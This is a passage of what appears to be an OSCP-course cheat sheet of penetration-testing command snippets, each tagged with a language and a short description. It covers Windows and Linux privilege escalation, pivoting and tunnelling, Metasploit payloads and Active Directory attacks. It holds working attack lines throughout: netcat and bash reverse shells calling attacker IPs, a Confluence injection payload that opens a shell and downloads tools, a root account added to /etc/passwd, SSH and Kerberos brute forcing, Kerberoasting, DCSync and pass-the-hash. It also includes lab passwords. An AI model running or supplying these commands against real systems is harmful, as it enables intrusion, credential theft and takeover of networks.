'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument -conf=C:\test\path' | Get-ModifiablePath -Literal ; $ModifiableFiles lang: ps1 tags: oscp desc: Analyzing the function ModifiablePath - cmd: icacls .\Documents\BetaServ.exe lang: ps1 tags: oscp desc: Displaying permissions on the binary of BetaService - cmd: Restart-Service BetaService lang: ps1 tags: oscp desc: Restarting BetaService - cmd: $env:path lang: ps1 tags: oscp desc: Display the PATH environment variable - cmd: x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll lang: sh tags: oscp desc: CrossCompile the C++ Code to a 64bit DLL - cmd: Restart-Service BetaService ; net user ; net localgroup administrators lang: ps1 tags: oscp desc: Restart the service _BetaService_ and confirm _dave2_ was created as local administrator - cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName lang: ps1 tags: oscp desc: List of services with binary path - cmd: wmic service get name,pathname | findstr /i /v ... lang: ps1 tags: oscp desc: List of services with spaces and missing quotes in the binary path - cmd: Start-Service GammaService ; Stop-Service GammaService lang: ps1 tags: oscp desc: Using StartService and StopService to check if user steve has permissions to start and stop GammaService - cmd: icacls "C:\" ; icacls "C:\Program Files" lang: ps1 tags: oscp desc: Reviewing permissions on the paths __C:\\__ and __C:\\Program Files\\__ - cmd: icacls "C:\Program Files\Enterprise Apps" lang: ps1 tags: oscp desc: Reviewing permissions on the __Enterprise Apps__ directory - cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe ; copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe' lang: ps1 tags: oscp desc: Download adduser.exe, save it as Current.exe, and copy it to Enterprise Apps directory - cmd: Start-Service GammaService ; net user ; net localgroup administrators lang: ps1 tags: oscp desc: Start service GammaService and confirm that dave2 was created as member of local Administrators group - cmd: iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-UnquotedService lang: ps1 tags: oscp desc: Using GetUnquotedService to list potential vulnerable services - cmd: Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" ; Restart-Service GammaService ; net user ; net localgroup administrators lang: ps1 tags: oscp desc: Using the AbuseFunction to exploit the unquoted service path of GammaService - cmd: schtasks /query /fo LIST /v lang: ps1 tags: oscp desc: Display a list of all scheduled tasks on CLIENTWK220 - cmd: icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe lang: ps1 tags: oscp desc: Display permissions on the executable file __BackendCacheCleanup.exe__ - cmd: iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe ; move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak ; move .\BackendCacheCleanup.exe .\Pictures\ lang: ps1 tags: oscp desc: Download and replace executable file __BackendCacheCleanup.exe__ - cmd: net user ; net localgroup administrators lang: ps1 tags: oscp desc: Display permissions on the executable file __BackendCacheCleanup.exe__ - cmd: .\PrintSpoofer64.exe -i -c powershell.exe lang: ps1 tags: oscp desc: Using the _PrintSpoofer_ tool to get an interactive PowerShell session in the context of NT AUTHORITY\\SYSTEM. - cmd: ls -l /etc/shadow lang: sh tags: oscp desc: Inspecting file permissions and users ownership - cmd: routel lang: sh tags: oscp desc: Printing the routes on Linux - cmd: ss -anp lang: sh tags: oscp desc: Listing all - cmd: cat /etc/iptables/rules.v4 lang: sh tags: oscp desc: Inspecting custom IP tables - cmd: ls -lah /etc/cron* lang: sh tags: oscp desc: Listing all cron - cmd: crontab -l lang: sh tags: oscp desc: Listing cron jobs for the current user - cmd: sudo crontab -l lang: sh tags: oscp desc: Listing cron jobs for the root user - cmd: dpkg -l lang: sh tags: oscp desc: Listing all - cmd: find / -writable -type d 2>/dev/null lang: sh tags: oscp desc: Listing all world - cmd: cat /etc/fstab ; mount lang: sh tags: oscp desc: Listing content - cmd: lsblk lang: sh tags: oscp desc: Listing all - cmd: lsmod lang: sh tags: oscp desc: Listing loaded - cmd: /sbin/modinfo libata lang: sh tags: oscp desc: Displaying - cmd: find / -perm -u=s -type f 2>/dev/null lang: sh tags: oscp desc: Searching for - cmd: env lang: sh tags: oscp desc: Inspecting Environment Variables - cmd: cat .bashrc lang: sh tags: oscp desc: Inspecting .bashrc - cmd: su - root lang: sh tags: oscp desc: Becoming 'root' user with the leaked credential - cmd: crunch 6 6 -t Lab%%% > wordlist lang: sh tags: oscp desc: Generating a wordlist for a bruteforce attack - cmd: cat wordlist lang: sh tags: oscp desc: Inspecting the Wordlist Content - cmd: hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V lang: sh tags: oscp desc: Successfully bruteforced eve's password - cmd: ssh eve@192.168.50.214 lang: sh tags: oscp desc: Successfully Logged in as eve - cmd: sudo -i lang: sh tags: oscp desc: Elevating to root - cmd: watch -n 1 "ps -aux | grep pass" lang: sh tags: oscp desc: Harvesting Active Processes for Credentials - cmd: sudo tcpdump -i lo -A | grep "pass" lang: sh tags: oscp desc: Using tcpdump to Perform Password Sniffing - cmd: grep "CRON" /var/log/syslog lang: sh tags: oscp desc: Inspecting the cron log file - cmd: cat /home/joe/.scripts/user_backups.sh ; ls -lah /home/joe/.scripts/user_backups.sh lang: sh tags: oscp desc: Showing the content and - cmd: cd .scripts ; echo >> user_backups.sh ; echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh ; cat user_backups.sh lang: sh tags: oscp desc: Inserting a reverse shell - cmd: openssl passwd w00t ; echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd ; su root2 ; w00t ; id lang: sh tags: oscp desc: Escalating privileges by - cmd: passwd lang: sh tags: oscp desc: Executing the passswd program - cmd: ps u -C passwd lang: sh tags: oscp desc: Inspecting passwd's process credentials - cmd: grep Uid /proc/1932/status lang: sh tags: oscp desc: Inspecting passwd's process credentials - cmd: cat /proc/1131/status | grep Uid lang: sh tags: oscp desc: Inspecting passwd's process credentials - cmd: ls -asl /usr/bin/passwd lang: sh tags: oscp desc: Revealing the SUID flag in the passwd binary application - cmd: find /home/joe/Desktop -exec "/usr/bin/bash" -p \; lang: sh tags: oscp desc: Getting a root shell by abusing SUID program - cmd: /usr/sbin/getcap -r / 2>/dev/null lang: sh tags: oscp desc: Manually Enumerating Capabilities - cmd: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ; id lang: sh tags: oscp desc: Getting a root shell through capabilities exploitation - cmd: sudo -l lang: sh tags: oscp desc: Inspecting current user's sudo permissions - cmd: COMMAND='id' ; TF=$(mktemp) ; echo "$COMMAND" > $TF ; chmod +x $TF ; sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root lang: sh tags: oscp desc: Attempting to abuse tcpdump sudo permissions - cmd: cat /var/log/syslog | grep tcpdump lang: sh tags: oscp desc: Inspecting the syslog file for 'tcpdump' related events - cmd: su - root ; aa-status lang: sh tags: oscp desc: Verifying AppArmon status - cmd: sudo apt-get changelog apt ; id lang: sh tags: oscp desc: Obtaining a root shell by abusing sudo permissions - cmd: cat /etc/issue lang: sh tags: oscp desc: Gathering general information on - cmd: uname -r ; arch lang: sh tags: oscp desc: Gathering kernel and - cmd: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8" lang: sh tags: oscp desc: Using searchsploit to - cmd: cp /usr/share/exploitdb/exploits/linux/local/45010.c . ; head 45010.c -n 20 lang: sh tags: oscp desc: Identifying the exploit source code instructions. - cmd: mv 45010.c cve-2017-16995.c lang: sh tags: oscp desc: Renaming the Exploit - cmd: gcc cve-2017-16995.c -o cve-2017-16995 lang: sh tags: oscp desc: Compiling the Exploit on the target machine - cmd: file cve-2017-16995 lang: sh tags: oscp desc: Examining the exploit binary file's architecture - cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/ lang: sh tags: oscp desc: Executing the modified reverse shell payload. - cmd: id lang: sh tags: oscp desc: Bash reverse shell caught by our Netcat listener, and confirmed with the id command. - cmd: ip addr lang: sh tags: oscp desc: Enumerating network interfaces on CONFLUENCE01. - cmd: ip route lang: sh tags: oscp desc: Enumerating routes on CONFLUENCE01. - cmd: cat /var/atlassian/application-data/confluence/confluence.cfg.xml lang: sh tags: oscp desc: The credentials found in the Confluence confluence.cfg.xml file on CONFLUENCE01. - cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 lang: sh tags: oscp desc: Running the Socat port forward command. - cmd: psql -h 192.168.50.63 -p 2345 -U postgres ; \l lang: sh tags: oscp desc: Connecting to the PGDATABASE01 PostgreSQL service and listing databases using psql, through our port forward. - cmd: \c confluence ; select * from cwd_user; lang: sh tags: oscp desc: The contents of the cwd_user table in the confluence database. - cmd: hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt lang: sh tags: oscp desc: Hashcat having cracked the database_admin, hr_admin and rdp_admin account hashes. - cmd: ssh database_admin@192.168.50.63 -p2222 ; yes lang: sh tags: oscp desc: Connecting to SSH server on PGDATABASE01, through the port forward on CONFLUENCE01. - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh database_admin@10.4.50.215 lang: sh tags: oscp desc: Giving our reverse shell TTY functionality with Python3's pty, and logging into PGDATABASE01 as database_admin. - cmd: for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done lang: sh tags: oscp desc: Using a bash loop with Netcat to sweep for port 445 in the newlyfound subnet. - cmd: ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215 lang: sh tags: oscp desc: Running the local port forward command. - cmd: proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217 lang: sh tags: oscp desc: The NmapoverProxychains command output. - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 ; yes lang: sh tags: oscp desc: The SSH remote port forward being set up, connecting to the Kali machine. - cmd: psql -h 127.0.0.1 -p 2345 -U postgres ; \l lang: sh tags: oscp desc: Listing databases on the PGDATABASE01, using psql through the SSH remote port forward. - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 9998 kali@192.168.118.4 ; yes lang: sh tags: oscp desc: Making the SSH connection with the remote dynamic port forwarding option. - cmd: sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24 lang: sh tags: oscp desc: Running sshuttle from our Kali machine, pointing to the forward port on CONFLUENCE01. - cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64 ; y lang: sh tags: oscp desc: Connecting to the RDP server on MULTISERVER03 using xfreerdp. - cmd: where ssh lang: sh tags: oscp desc: Finding ssh.exe on MULTISERVER03. - cmd: ssh.exe -V lang: sh tags: oscp desc: The version of OpenSSH client that is bundled with Windows is higher than 7.6. - cmd: ssh -N -R 9998 kali@192.168.118.4 ; yes lang: sh tags: oscp desc: Connecting back to our Kali machine to open the remote dynamic port forward. - cmd: tail /etc/proxychains4.conf lang: sh tags: oscp desc: Proxychains configuration file - cmd: proxychains psql -h 10.4.50.215 -U postgres ; \l lang: sh tags: oscp desc: Connecting to the PostgreSQL server with psql and Proxychains. - cmd: sudo systemctl start apache2 lang: sh tags: oscp desc: Starting Apache2. - cmd: find / -name nc.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/ lang: sh tags: oscp desc: Copying nc.exe to the Apache2 webroot. - cmd: C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446 lang: sh tags: oscp desc: The nc.exe reverse shell payload we execute in the web shell. - cmd: find / -name plink.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/ lang: sh tags: oscp desc: Copying plink.exe to our Apache2 webroot. - cmd: C:\Windows\Temp\plink.exe -ssh -l kali -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4 lang: sh tags: oscp desc: Making an SSH connection to the Kali machine. - cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833 ; y lang: sh tags: oscp desc: Connecting to the RDP server with xfreerdp, through the Plink port forward. - cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64 lang: sh tags: oscp desc: Connecting to the RDP server with xfreerdp. - cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215 lang: sh tags: oscp desc: The portproxy command being run. - cmd: netstat -anp TCP | find "2222" lang: sh tags: oscp desc: netstat showing that TCP/2222 is listening on the external interface. - cmd: netsh interface portproxy show all lang: sh tags: oscp desc: Listing all the portproxy port forwarders set up with Netsh. - cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow lang: sh tags: oscp desc: Poking a hole in the Windows Firewall with Netsh. - cmd: ssh database_admin@192.168.50.64 -p2222 lang: sh tags: oscp desc: SSHing into PGDATABASE01 through the Netsh port forward. - cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222" lang: sh tags: oscp desc: Deleting the firewall rule with Netsh. - cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64 lang: sh tags: oscp desc: Deleting the port forwarding rule with Netsh. - cmd: sudo cp $(which chisel) /var/www/html/ lang: sh tags: oscp desc: Copying the Chisel binary to the Apache2 server folder. - cmd: tail -f /var/log/apache2/access.log lang: sh tags: oscp desc: The request for the Chisel binary hitting our Apache2 server. - cmd: chisel server --port 8080 --reverse lang: sh tags: oscp desc: Starting the Chisel server on port 8080. - cmd: sudo tcpdump -nvvvXi tun0 tcp port 8080 lang: sh tags: oscp desc: Starting tcpdump to listen on TCP/8080 through the tun0 interface. - cmd: chisel -h lang: sh tags: oscp desc: The version of Chisel reported as part of the h output, along with the version of Go used to compile it. - cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/ lang: sh tags: oscp desc: The Wget payload executed within our cURL Confluence injection command, again. - cmd: ss -ntplu lang: sh tags: oscp desc: Using ss to check if our SOCKS port has been opened by the Kali Chisel server. - cmd: sudo apt install ncat lang: sh tags: oscp desc: Installing Ncat with apt. - cmd: ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215 lang: sh tags: oscp desc: A successful SSH connection through our Chisel HTTP tunnel. - cmd: cd dns_tunneling ; cat dnsmasq.conf lang: sh tags: oscp desc: The basic configuration for our Dnsmasq server. - cmd: sudo dnsmasq -C dnsmasq.conf -d lang: sh tags: oscp desc: Starting Dnsmasq with the basic configuration. - cmd: resolvectl status lang: sh tags: oscp desc: Checking the configured DNS server on PGDATABASE01. - cmd: nslookup exfiltrated-data.feline.corp lang: sh tags: oscp desc: Using nslookup to make a DNS request for exfiltrateddata.feline.corp - cmd: cat dnsmasq_txt.conf ; sudo dnsmasq -C dnsmasq_txt.conf -d lang: sh tags: oscp desc: Checking the TXT configuration file then starting Dnsmasq with it. - cmd: nslookup -type=txt www.feline.corp lang: ps1 tags: oscp desc: The TXT record response from www.feline.corp. - cmd: sudo tcpdump -i ens192 udp port 53 lang: sh tags: oscp desc: Starting tcpdump to listen for packets on UDP port 53. - cmd: dnscat2-server feline.corp lang: sh tags: oscp desc: Starting the dnscat2 server. - cmd: ./dnscat feline.corp lang: sh tags: oscp desc: The dnscat2 client running on PGDATABASE01. - cmd: sudo msfdb init lang: sh tags: oscp desc: Creating and initializing the Metasploit database - cmd: sudo systemctl enable postgresql lang: sh tags: oscp desc: Enabling the postgresql database service at boot time - cmd: sudo msfconsole lang: sh tags: oscp desc: Starting the Metasploit Framework - cmd: msfvenom -l payloads --platform windows --arch x64 lang: sh tags: oscp desc: Creating a Windows executable with a - cmd: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe lang: sh tags: oscp desc: Creating a Windows executable with a - cmd: iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe lang: sh tags: oscp desc: Download nonstaged payload binary and execute it - cmd: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe lang: sh tags: oscp desc: Creating a Windows executable with a - cmd: sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza lang: sh tags: oscp desc: Gaining remote desktop access inside - cmd: sudo msfconsole -r listener.rc lang: sh tags: oscp desc: Executing the resource script - cmd: iwr -uri http://192.168.119.4/met.exe -Outfile met.exe lang: sh tags: oscp desc: Executing the Windows executable containing the Meterpreter payload - cmd: ls -l /usr/share/metasploit-framework/scripts/resource lang: sh tags: oscp desc: Listing all resource scripts provided by Metasploit - cmd: xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75 lang: sh tags: oscp desc: Connecting to the Windows 11 client using "xfreerdp" - cmd: net user /domain lang: ps1 tags: oscp desc: Running "net user" to display users in the domain - cmd: net user jeffadmin /domain lang: ps1 tags: oscp desc: Running "net user" against a specific user - cmd: net group /domain lang: ps1 tags: oscp desc: Running "net group" to display groups in the domain - cmd: net group "Sales Department" /domain lang: ps1 tags: oscp desc: Running "net group" to display members in specific group - cmd: C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() lang: ps1 tags: oscp desc: Domain class from System.DirectoryServices.ActiveDirectory namespace - cmd: powershell -ep bypass ; .\enumeration.ps1 lang: ps1 tags: oscp desc: Output displaying information stored in our first variable - cmd: .\enumeration.ps1 lang: ps1 tags: oscp desc: Printing the $PDC variable - cmd: ([adsi]'').distinguishedName lang: ps1 tags: oscp desc: Using ADSI to obtain the DN for the domain - cmd: Import-Module .\function.ps1 lang: ps1 tags: oscp desc: Importing our function to memory - cmd: LDAPSearch -LDAPQuery "(samAccountType=805306368)" lang: ps1 tags: oscp desc: Performing a user search using the new function - cmd: LDAPSearch -LDAPQuery "(objectclass=group)" lang: ps1 tags: oscp desc: Searching all possible groups in AD - cmd: $sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))" lang: ps1 tags: oscp desc: Adding the search to our variable called $sales - cmd: $sales.properties.member lang: ps1 tags: oscp desc: Printing the member attribute on the Sales Department group object - cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))" ; $group.properties.member lang: ps1 tags: oscp desc: Printing the member attribute on the Development Department group object - cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))" ; $group.properties.member lang: ps1 tags: oscp desc: Printing the member attribute on the Management Department group object - cmd: Import-Module .\PowerView.ps1 lang: ps1 tags: oscp desc: Importing PowerView to memory - cmd: Get-NetDomain lang: ps1 tags: oscp desc: Obtaining domain information - cmd: Get-NetUser lang: ps1 tags: oscp desc: Querying users in the domain - cmd: Get-NetUser | select cn lang: ps1 tags: oscp desc: Querying users using select statement - cmd: Get-NetUser | select cn,pwdlastset,lastlogon lang: ps1 tags: oscp desc: Querying users displaying pwdlastset and lastlogon - cmd: Get-NetGroup | select cn lang: ps1 tags: oscp desc: Querying groups in the domain using PowerView - cmd: Get-NetGroup "Sales Department" | select member lang: ps1 tags: oscp desc: Enumerating the "Sales Department" group - cmd: Get-NetComputer lang: ps1 tags: oscp desc: Partial domain computer overview - cmd: Get-NetComputer | select operatingsystem,dnshostname lang: ps1 tags: oscp desc: Displaying OS and hostname - cmd: Find-LocalAdminAccess lang: ps1 tags: oscp desc: Scanning domain to find local administrative privileges for our user - cmd: Get-NetSession -ComputerName files04 ; Get-NetSession -ComputerName web04 lang: ps1 tags: oscp desc: Checking logged on users with GetNetSession - cmd: Get-NetSession -ComputerName files04 -Verbose ; Get-NetSession -ComputerName web04 -Verbose lang: ps1 tags: oscp desc: Adding verbosity to our GetNetSession command - cmd: Get-NetSession -ComputerName client74 lang: ps1 tags: oscp desc: Running GetNetSession on CLIENT74 - cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl lang: ps1 tags: oscp desc: Displaying permissions on the DefaultSecurity registry hive - cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion lang: ps1 tags: oscp desc: Querying operating system and version - cmd: .\PsLoggedon.exe \\files04 lang: ps1 tags: oscp desc: Using PsLoggedOn to see user logons at Files04 - cmd: .\PsLoggedon.exe \\web04 lang: ps1 tags: oscp desc: Using PsLoggedOn to see user logons at Web04 - cmd: .\PsLoggedon.exe \\client74 lang: ps1 tags: oscp desc: Using PsLoggedOn to see user logons at CLIENT74 - cmd: setspn -L iis_service lang: ps1 tags: oscp desc: Listing SPN linked to a certain user account - cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname lang: ps1 tags: oscp desc: Listing the SPN accounts in the domain - cmd: nslookup.exe web04.corp.com lang: ps1 tags: oscp desc: Resolving the web04.corp.com name - cmd: Get-ObjectAcl -Identity stephanie lang: ps1 tags: oscp desc: Running GetObjectAcl specifying our user - cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104 lang: ps1 tags: oscp desc: Converting the ObjectISD into name - cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553 lang: ps1 tags: oscp desc: Converting the SecurityIdentifier into name - cmd: Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights lang: ps1 tags: oscp desc: Enumerating ACLs for the Management Group - cmd: net group "Management Department" stephanie /add /domain lang: ps1 tags: oscp desc: Using "net.exe" to add ourselves to domain group - cmd: net group "Management Department" stephanie /del /domain lang: ps1 tags: oscp desc: Using "net.exe" to remove ourselves from domain group - cmd: Find-DomainShare lang: ps1 tags: oscp desc: Domain Share Query - cmd: ls \\dc1.corp.com\sysvol\corp.com\ lang: ps1 tags: oscp desc: Listing contents of the SYSVOL share - cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\ lang: ps1 tags: oscp desc: Listing contents of the "SYSVOL\policies share" - cmd: cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml lang: ps1 tags: oscp desc: Checking contents of oldpolicybackup.xml file - cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE" lang: ps1 tags: oscp desc: Using gppdecrypt to decrypt the password - cmd: ls \\FILES04\docps1are lang: sh tags: oscp desc: Listing the contents of docsare - cmd: ls \\FILES04\docps1are\docs\do-not-ps1are lang: sh tags: oscp desc: Listing the contents of donotps1are - cmd: cat \\FILES04\docps1are\docs\do-not-ps1are\start-email.txt lang: sh tags: oscp desc: Checking the "startemail.txt" file - cmd: Import-Module .\Sharphound.ps1 lang: ps1 tags: oscp desc: Importing the SharpHound script to memory - cmd: Get-Help Invoke-BloodHound lang: ps1 tags: oscp desc: Checking the SharpHound options - cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit" lang: ps1 tags: oscp desc: Running SharpHound to collect domain data - cmd: ls C:\Users\stephanie\Desktop\ lang: sh tags: oscp desc: SharpHound generated files - cmd: sudo neo4j start lang: sh tags: oscp desc: Starting the Neo4j service in Kali Linux - cmd: bloodhound lang: sh tags: oscp desc: Starting BloodHound in Kali Linux - cmd: xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75 lang: sh tags: oscp desc: Connecting to CLIENT75 via RDP - cmd: dir \\web04.corp.com\backup lang: ps1 tags: oscp desc: Displaying contents of a SMB share - cmd: impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete lang: ps1 tags: oscp desc: Using GetNPUsers to perform ASREP roasting - cmd: kerbrute userenum --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt lang: sh tags: oscp desc: enumerate users of AD using bruteforce userlist - cmd: kerbrute passwordspray --dc 192.168.56.30 -d mini.lab users.txt phantom lang: sh tags: oscp desc: perform a horizontal brute force attack against a list of domain users - cmd: kerbrute bruteuser --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Passwords/500-worst-passwords.txt ben lang: sh tags: oscp desc: traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy. - cmd: cat combos.lst | kerbrute --dc 192.168.56.30 -d mini.lab bruteforce - lang: sh tags: oscp desc: bruteforce with reads username and password combinations (in the format username:password) - cmd: hashcat --help | grep -i "Kerberos" lang: sh tags: oscp desc: Obtaining the correct mode for Hashcat - cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: Cracking the ASREP hash with Hashcat - cmd: cd C:\Tools ; .\Rubeus.exe asreproast /nowrap lang: ps1 tags: oscp desc: Using Rubeus to obtain the ASREP hash of _dave_ - cmd: sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: Cracking the modified ASREP hash - cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast lang: ps1 tags: oscp desc: Utilizing Rubeus to perform a Kerberoast attack - cmd: cat hashes.kerberoast ; hashcat --help | grep -i "Kerberos" lang: sh tags: oscp desc: Reviewing the correct Hashcat mode - cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: Cracking the TGSREP hash - cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete lang: sh tags: oscp desc: Using impacketGetUserSPNs to perform Kerberoasting on Linux - cmd: sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: Cracking the TGSREP hash - cmd: whoami /user lang: ps1 tags: oscp desc: Obtaining the domain SID - cmd: klist lang: ps1 tags: oscp desc: Inspecting the injected ticket in memory or listing Kerberos tickets to confirm the silver ticket is submitted to the current session - cmd: iwr -UseDefaultCredentials http://web04 lang: ps1 tags: oscp desc: Accessing the SMB share with the silver ticket - cmd: impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70 lang: sh tags: oscp desc: Using secretsdump to perform the dcsync attack to obtain the NTLM hash of _dave_ - cmd: impacket-secretsdump mini.lab/bob:"superman"@192.168.56.31 lang: sh tags: oscp desc: Using secretsdump to get the secrets of the owned machine - cmd: wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc" lang: ps1 tags: oscp desc: Running the wmic utility to spawn a process on a remote system. - cmd: $username = 'jen'; ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; lang: ps1 tags: oscp desc: Executing the WMI PowerShell payload. - cmd: python3 encode.py lang: sh tags: oscp desc: Running the base64 encoder Python script - cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; $Options = New-CimSessionOption -Protocol DCOM ; $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; lang: ps1 tags: oscp desc: Executing the WMI payload with base64 reverse shell - cmd: winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami" lang: ps1 tags: oscp desc: Executing commands remotely via WinRS - cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; New-PSSession -ComputerName 192.168.50.73 -Credential $credential lang: ps1 tags: oscp desc: Establishing a PowerShell Remote Session via WinRM - cmd: Enter-PSSession 1 lang: ps1 tags: oscp desc: Inspecting the PowerShell Remoting session - cmd: ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd lang: ps1 tags: oscp desc: Obtaining an Interactive Shell on the Target System with PsExec - cmd: /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73 lang: sh tags: oscp desc: Passing the hash using Impacket wmiexec - cmd: net use \\files04 ; klist lang: ps1 tags: oscp desc: Mapping a network share on a remote server and listing Kerberos tickets - cmd: cd C:\tools\SysinternalsSuite\ ; .\PsExec.exe \\files04 cmd lang: ps1 tags: oscp desc: Opening remote connection using Kerberos - cmd: whoami ; ls \\web04\backup lang: ps1 tags: oscp desc: Verifying that the user jen has no access to the shared folder desc: Injecting the selected TGS into process memory. - cmd: ls \\web04\backup lang: ps1 tags: 